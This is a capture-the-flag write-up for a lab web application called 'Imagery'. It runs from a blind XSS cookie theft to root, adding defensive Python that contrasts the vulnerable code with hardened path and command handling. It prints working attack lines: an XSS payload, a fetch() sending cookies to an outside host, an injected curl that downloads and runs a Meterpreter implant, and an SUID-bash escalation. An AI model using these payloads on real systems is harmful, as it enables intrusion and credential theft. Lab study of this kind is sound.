Imagery
Overview
Imagery is a Python web application whose bug reporting feature is vulnerable to blind XSS. The admin's session cookie is exfiltrated from their browser, giving access to a log download endpoint with an LFI vulnerability. Source code and a database are read via the LFI, yielding a crackable MD5 hash. A visual transform feature with OS command injection provides a foothold as the web user. Post-exploitation finds an AES-encrypted backup whose password is bruteforced from a wordlist; it contains another crackable hash for user mark. A sudo-allowed charcol binary lets mark schedule a cron-like task that sets the SUID bit on bash, granting root.
Recon
Nmap
```bash
sudo nmap -sC -sV -vv -oA tcp 10.129.242.164 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.242.164
```
Port 8000 serves a Python web application. Image upload functionality appears normal on initial testing.
Blind XSS in Bug Report
A bug reporting form is discovered. Testing HTML injection reveals a blind XSS: the admin reviews submitted reports in a browser, so markup placed in the report body is rendered and executes in the admin's session rather than ours.
Cookie Theft via XSS
Inject a payload that loads an external JavaScript file to exfiltrate the admin cookie:
```http
POST /report_bug HTTP/1.1
Host: 10.129.242.164:8000
...
{"bugName":"title","bugDetails":"\"><img src=x onerror=\"var newSrc = document.createElement('script'); newSrc.setAttribute('src', 'http://10.10.15.235/js');document.head.appendChild(newSrc);\" />"}
```
The js file served on port 80:
```javascript
fetch("http://10.10.15.235/cookie="+btoa(document.cookie))
```
A callback arrives with the admin's base64-encoded cookie.
Foothold
LFI in Log Download Endpoint
With the admin's cookie set, the admin dashboard is reachable. It has a log file download feature that takes a filename parameter in the URL.
The parameter is passed straight to a file read with no restriction on directory or extension, so arbitrary files readable by the web process can be retrieved: Local File Inclusion.
Source Code and Database Extraction
Read /proc/self/environ and /proc/self/cmdline through the LFI to identify the application's working directory and Python path, then pull the source files and the db.json it references.
The db.json file contains two MD5 hashes. One cracks immediately against rockyou:
```bash
hashcat -a 0 -m 0 md5 /mnt/hgfs/I/data/rockyou.txt
```
```
5d9c1d507a3f76af1e5c97a3ad1eaa31
2c65c8d7bfbca32a3ed42596192384f6 → iambatman
```
Command Injection via apply_visual_transform
Log in with the cracked credentials to access the apply_visual_transform endpoint:
The x crop parameter is vulnerable to OS command injection: it is interpolated unsanitised into a shell command line that invokes an image processing binary. Generate a reverse-shell payload and stage it on the attacker web server:
```bash
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=tun0 lport=8443 -f elf -o ekg02
```
Start a matching multi/handler on port 8443, then trigger the payload. The `;` ends the intended crop command and the trailing `&` backgrounds the implant so the request returns:
```http
POST /apply_visual_transform HTTP/1.1
...
{"imageId":"...", "transformType":"crop","params":{"x":"0; curl 10.10.15.235/ekg02 -o /tmp/ek;chmod 0777 /tmp/ek; /tmp/ek&","y":0,"width":1920,"height":1081}}
```
Meterpreter session received as www-data.
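To make the two server-side bugs concrete (the log download LFI above and the crop parameter injection here), the following is an added Python example, not the application's actual source: a hypothetical reconstruction of each vulnerable pattern next to a hardened form. The log directory, binary path and function names are assumptions; only the shape of the bugs (a filename used as-is in a file read, and a crop parameter spliced into a shell string) comes from the writeup.

```python
import re
import subprocess
from pathlib import Path

LOG_DIR = Path("/srv/app/logs")              # assumed, not the target's real path
TRANSFORM_BIN = "/usr/local/bin/transform"   # placeholder for the image binary

# ---- vulnerable patterns (hypothetical reconstruction) -------------------

def read_log_vulnerable(filename: str) -> bytes:
    """LFI: the user-supplied name is joined to the directory unchecked,
    so '../../proc/self/environ' walks out of LOG_DIR."""
    with open(LOG_DIR / filename, "rb") as fh:
        return fh.read()


def crop_cmd_vulnerable(image: str, x, y, w, h) -> str:
    """Command injection: parameters land in one string run with shell=True,
    so x = '0; curl ...' executes as a second command."""
    return f"{TRANSFORM_BIN} crop {image} {x} {y} {w} {h}"


# ---- hardened forms -------------------------------------------------------

def safe_log_path(filename: str, base: Path = LOG_DIR) -> Path:
    """Allow-list the name, then prove the resolved path stays inside base."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]+\.log", filename):
        raise ValueError(f"bad log name: {filename!r}")
    base_r = base.resolve()
    candidate = (base_r / filename).resolve()
    if candidate.parent != base_r:
        raise ValueError("path escapes log directory")
    return candidate


def _as_dim(name: str, value, limit: int = 20000) -> int:
    """Accept only a plain non-negative integer (int or digit string)."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise ValueError(f"{name} must be an integer")
    if isinstance(value, str) and not re.fullmatch(r"\d{1,6}", value):
        raise ValueError(f"{name} must be an integer")
    n = int(value)
    if not 0 <= n <= limit:
        raise ValueError(f"{name} out of range")
    return n


def crop_argv(image_id: str, x, y, w, h) -> list:
    """Build an argv list: no shell, every parameter validated and stringified."""
    if not re.fullmatch(r"[A-Za-z0-9-]{1,64}", image_id):
        raise ValueError("bad image id")
    dims = [_as_dim(n, v) for n, v in (("x", x), ("y", y), ("width", w), ("height", h))]
    return [TRANSFORM_BIN, "crop", image_id, *map(str, dims)]


def run_crop(image_id: str, x, y, w, h) -> subprocess.CompletedProcess:
    """Execute the binary directly; shell metacharacters in inputs are inert."""
    return subprocess.run(crop_argv(image_id, x, y, w, h), capture_output=True, check=False)


def rejected(fn, *args) -> bool:
    """Helper for demonstrations: True if fn(*args) raises ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

The injected value from the writeup, `0; curl 10.10.15.235/ekg02 -o /tmp/ek;...`, passes straight through `crop_cmd_vulnerable` and is refused by `crop_argv` before any process is spawned; likewise `../../proc/self/environ` never reaches `open()` in `safe_log_path`.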
Lateral Movement
Linpeas finds an AES-encrypted backup at /var/backup/web_20250806_120723.zip.aes:
The .aes extension is the container format written by pyAesCrypt. Bruteforce its password from a wordlist with dpyAesCrypt:
https://github.com/Nabeelcn25/dpyAesCrypt.py
Unzip the decrypted archive. It contains another db.json with an MD5 hash for user mark:
Crack the hash: supersmash
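Both db.json files are attacked the same way (offline MD5 dictionary cracking, done above with hashcat). The following is an added Python example, not code from the writeup, showing that logic end to end: parse a db.json, pull the 32-hex password fields, and test each wordlist candidate. The sample db.json and wordlist are constructed here with the record layout assumed (a users list of username/password objects); the target's real layout and hash values are not reproduced.

```python
import hashlib
import json
import re
from typing import Iterable, Optional

# Constructed sample in the assumed shape; hashes are generated locally, not copied from the box.
SAMPLE_DB_JSON = json.dumps({
    "users": [
        {"username": "admin", "password": hashlib.md5(b"not-in-wordlist-7Qx!").hexdigest()},
        {"username": "mark", "password": hashlib.md5(b"supersmash").hexdigest()},
    ]
})

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "iambatman", "supersmash", "letmein"]

HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def load_wordlist(path: str) -> Iterable[str]:
    """Stream a wordlist; rockyou contains non-UTF-8 bytes, so decode as latin-1."""
    with open(path, "rb") as fh:
        for line in fh:
            yield line.rstrip(b"\r\n").decode("latin-1")


def extract_hashes(db_json: str) -> dict:
    """Map username -> lowercase MD5 for every user record carrying a 32-hex password."""
    data = json.loads(db_json)
    found = {}
    for user in data.get("users", []):
        name, pw = user.get("username"), user.get("password", "")
        if name and isinstance(pw, str) and HEX32.fullmatch(pw):
            found[name] = pw.lower()
    return found


def crack_md5(target: str, words: Iterable[str]) -> Optional[str]:
    """Unsalted MD5: hash each candidate and compare; None if the list is exhausted."""
    target = target.lower()
    for w in words:
        if hashlib.md5(w.encode("latin-1", "replace")).hexdigest() == target:
            return w
    return None


def crack_db_json(db_json: str, words: Iterable[str]) -> dict:
    """Crack every hash in the file; the wordlist is materialised once for reuse."""
    candidates = list(words)
    return {user: crack_md5(h, candidates) for user, h in extract_hashes(db_json).items()}


if __name__ == "__main__":
    for user, plain in crack_db_json(SAMPLE_DB_JSON, WORDLIST).items():
        print(f"{user}: {plain or '<not cracked>'}")
```

Because the hashes are unsalted, identical digests in the two db.json files would reveal password reuse without cracking either; hashcat does the same comparison far faster, but the data flow is exactly this.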
From the Meterpreter session, su mark with the password. User flag accessible.
Privilege Escalation
charcol - Scheduled Task → SUID
Mark can run /usr/local/bin/charcol as root via sudo.
charcol is a custom task scheduling tool. It requires a password reset before it will accept commands:
```bash
sudo /usr/local/bin/charcol -R
```
Then enter the charcol shell and schedule a cron-like task that sets the SUID bit on /bin/bash:
```bash
sudo /usr/local/bin/charcol shell
auto add --schedule "* * * * *" --command "/bin/bash -c 'chmod u+s /bin/bash'" --name "RedCellLearning"
```
Wait for the task to fire (within a minute; `ls -l /bin/bash` should show the s bit), then start bash with -p so it keeps the effective UID of 0 instead of dropping back to the real UID:
```bash
bash -p
```
Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | Web app enumeration | Bug report + image upload |
| Cookie theft | Blind XSS + JS exfiltration | Admin session cookie |
| LFI | Log download filename parameter | Source + DB extracted |
| Credential access | MD5 hash crack | iambatman login |
| Foothold | Command injection in crop param | Meterpreter as www-data |
| Lateral movement | AES backup bruteforce + hash crack | mark:supersmash |
| Privesc | sudo charcol → SUID bash | Root shell |

